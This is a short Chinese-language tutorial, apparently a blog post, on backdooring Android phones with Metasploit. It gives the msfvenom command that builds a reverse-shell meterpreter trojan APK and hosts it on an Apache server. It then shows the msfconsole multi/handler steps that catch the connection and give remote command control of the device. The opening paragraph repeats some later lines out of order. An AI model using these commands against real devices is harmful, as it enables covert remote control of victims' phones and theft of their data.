Metasploit后门攻击android
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHO
·
1、配置安卓木马程序
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545 R > /var/www/html/Lliang.apk
LHOST对应的是本机的ip地址
LPORT对于你要监听的端口
/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径
接着在终端里输入/etc/init.d/apache2 start 启动apache服务
2、启动MSF来加载模块
启动服务 msfconsole
设置payload
use exploit/multi/handler
加载模块
set payload android/meterpreter/reverse_tcp
选择Payload
show option
查看参数设置
注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口
确认无误后,便可以开始监听,使用 exploit
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。
更多推荐
已为社区贡献1条内容
所有评论(0)